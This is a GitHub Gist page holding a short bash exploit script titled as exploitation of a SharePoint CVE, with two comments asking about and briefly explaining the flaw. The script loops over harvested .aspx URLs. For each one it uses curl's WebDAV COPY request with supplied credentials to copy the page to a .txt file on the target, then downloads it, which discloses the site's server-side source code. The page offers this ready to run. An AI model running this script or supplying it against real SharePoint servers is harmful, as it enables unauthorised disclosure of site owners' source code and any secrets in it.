Created
June 28, 2023 07:44
-
-
Save Arkango/448ccb8da61c7fc752da08bc21c609d7 to your computer and use it in GitHub Desktop.
Sharepoint CVE-2021-45248 exploitation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #$1 file with links retrieved by the history ending in .aspx | |
| # also try filename.cs.aspx | |
| i=0 | |
| mkdir out | |
| for l in $(cat $1) | |
| do | |
| i=$((1+$i)) | |
| #copy the file from aspx to txt | |
| curl -X COPY "$l" --ntlm --negotiate -u "<credentials>" -H "Destination: /<path of the site>/Hometest"$i".txt" -k -x http://127.0.0.1:8080 | |
| #get the content and save | |
| curl "https://<targetsite>/Hometest$i.txt" -o ./out/$i.txt -k --ntlm --negotiate -u "<credentials>" -x http://127.0.0.1:8080 | |
| done | |
Can you provide more information on what the actual vulnerability is here?
When the copy or move option is enabled you can copy .aspx files to txt
Then see that to perform a source code disclosure
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Can you provide more information on what the actual vulnerability is here?